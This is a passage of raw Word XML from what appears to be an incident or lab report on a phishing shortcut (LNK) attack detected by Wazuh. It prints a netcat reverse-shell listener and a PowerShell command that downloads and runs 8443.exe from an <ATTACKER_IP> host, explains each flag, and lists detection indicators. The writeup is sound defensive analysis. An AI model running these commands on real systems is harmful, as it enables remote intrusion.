        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>whoami output confirming user context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="2D8E3691" w14:textId="4DF612A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="1A79CEF9" w14:textId="107AD71B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B8C7014" wp14:editId="264FDDBE">
            <wp:extent cx="3153215" cy="819264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18429011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01123" name="Picture 1842901123"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3153215" cy="819264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="4C860D5B" w14:textId="05460DDA">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="424CE0DB" w14:textId="7FDB0BB0">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="488F7CF2" w14:textId="7571F195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wazuh alert screenshot showing suspicious shell execution and file deletion activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="00ED5F9B" w14:paraId="1C10E6E6" w14:textId="23016E07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20748513" wp14:editId="2BCEAE02">
            <wp:extent cx="5829300" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8054894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89477" name="Picture 805489477"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="685800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="03DD527D" w14:textId="69847D76">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="1CD19EC6" w14:textId="6F56F6BB">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Commands / Steps Observed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="306DDBB2" w14:textId="7F54AF01">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker system (preparation):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="5251D146" w14:textId="65A48590">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -lvnp 8443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="511FFA31" w14:textId="1824885A">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="7F3F48B9" w14:textId="5E5436BF">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="736A889D" w14:textId="49DCB7C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Victim execution (contained within the malicious LNK target):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="6A8CF527" w14:textId="5BD6DE25">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\cmd.exe /c powershell.exe wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://&lt;ATTACKER_IP&gt;/8443.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -OutFile C:\icrm\8443.exe &amp;&amp; C:\icrm\8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="5782F38D" w14:textId="5114076E">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="4839E043" w14:textId="5044D99E">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explanation of the Attack (step-by-step)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="3BE2857E" w14:textId="072538D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The attacker delivers a phishing email containing a malicious shortcut attachment disguised as a legitimate notes/notepad file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="242820DF" w14:textId="026AA664">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The victim clicks the shortcut (notepad.exe), triggering the embedded command chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="343605ED" w14:textId="4D45E191">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The shortcut launches cmd.exe, which invokes PowerShell to download 8443.exe from the attacker-controlled server (&lt;ATTACKER_IP&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="0FBBC3CD" w14:textId="57610B03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The downloaded file is saved to C:\icrm\8443.exe and then executed immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="1867D91F" w14:textId="736D67C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After the payload runs, the victim system establishes a reverse shell connection to the attacker listener on TCP port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8443</w:t>
      </w:r>
      <w:r>
        <w:t>, allowing interactive command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="779D3CC2" w14:textId="7F70538B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The payload is subsequently removed from the folder, which reduces visible evidence on disk and is consistent with cleanup/anti-forensic behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="497E13CA" w14:textId="14674B31">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="1D9F6AA2" w14:textId="2653FBD6">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command Breakdown (line-by-line)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="47921E52" w14:textId="5B2B8A19">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -lvnp 8443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="40F65F3F" w14:textId="61350B29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:r>
        <w:t>: netcat used to receive inbound connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="48CC95CA" w14:textId="4327E7E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r>
        <w:t>: listen mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="79011CCF" w14:textId="3C14CC62">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-v</w:t>
      </w:r>
      <w:r>
        <w:t>: verbose output (shows connection details).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="6648B3DB" w14:textId="0C7F087A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-n</w:t>
      </w:r>
      <w:r>
        <w:t>: numeric addressing (no DNS lookups).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="241110ED" w14:textId="1234FD10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-p 8443</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: listens on TCP port </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8443</w:t>
      </w:r>
      <w:r>
        <w:t>, which is used as the reverse shell callback port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="1865E2C1" w14:textId="4D5F5D13">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="22340177" w14:textId="66ACAAA4">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\cmd.exe /c powershell.exe wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://&lt;ATTACKER_IP&gt;/8443.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -OutFile C:\icrm\8443.exe &amp;&amp; C:\icrm\8443.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="0015D0B4" w14:textId="741B63B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cmd.exe /c</w:t>
      </w:r>
      <w:r>
        <w:t>: executes the following command and exits. This is commonly used in malicious shortcuts to run a one-click execution chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="5F0D0C1F" w14:textId="2375D93F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:t>: runs PowerShell to perform a network download and file write operation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="591CC58B" w14:textId="770FED6C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://&lt;ATTACKER_IP&gt;/8443.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>: downloads the payload from the attacker-controlled web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="3A2CE763" w14:textId="3ADAA40A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-OutFile C:\icrm\8443.exe</w:t>
      </w:r>
      <w:r>
        <w:t>: writes the payload to C:\icrm\8443.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="277683BB" w14:textId="7DE8AA32">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&amp;&amp; C:\icrm\8443.exe</w:t>
      </w:r>
      <w:r>
        <w:t>: executes the payload only if the download succeeds, ensuring reliable staging and execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED5F9B" w:rsidR="00ED5F9B" w:rsidP="00ED5F9B" w:rsidRDefault="00ED5F9B" w14:paraId="2FD1AAA2" w14:textId="01474F98"/>
    <w:p w:rsidR="00C3354B" w:rsidP="00C3354B" w:rsidRDefault="6845FCFF" w14:paraId="312DC33D" w14:textId="67EABD97">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896682" w:id="17"/>
      <w:commentRangeStart w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Detection / IOCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
      <w:commentRangeEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="18"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="689A805E" w14:textId="4846B827">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="6845FCFF" w:rsidRDefault="6845FCFF" w14:paraId="183ED0CD" w14:textId="2975C02B">
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This incident was detected using existing endpoint monitoring/alerting. The detection screenshot shows events consistent with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="666578EF" w14:textId="27FF91EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Abnormal command shell execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (shortcut-driven cmd.exe invocation).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="4300B67D" w14:textId="25ADF4E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Suspicious cmd shell activity</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (execution chain behaviour).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00695885" w:rsidP="00E41785" w:rsidRDefault="6845FCFF" w14:paraId="2B982540" w14:textId="4B7B9DF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>PowerShell activity associated with file deletion</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (consistent with the disappearance of 8443.exe after execution).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="34B55AC4" w14:textId="21383334">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Detection of Phishing through LNK files detected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="53BB567B" w:rsidP="53BB567B" w:rsidRDefault="53BB567B" w14:paraId="346F7FFF" w14:textId="4008DD8C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="684D66D2" wp14:anchorId="6284D319">
            <wp:extent cx="5829300" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2668496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5489477" name="Picture 805489477"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId31">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="685800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
        <w:drawing>
          <wp:inline wp14:editId="2EC182DC" wp14:anchorId="5D9CFD66">
            <wp:extent cx="5829300" cy="2162175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13922444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92244416" name="Picture 1392244416"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId390838871">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="2162175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
        <w:drawing>
          <wp:inline wp14:editId="52E965BE" wp14:anchorId="1137976F">
            <wp:extent cx="5829300" cy="180975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15903945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90394596" name="Picture 1590394596"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId811046634">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="180975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
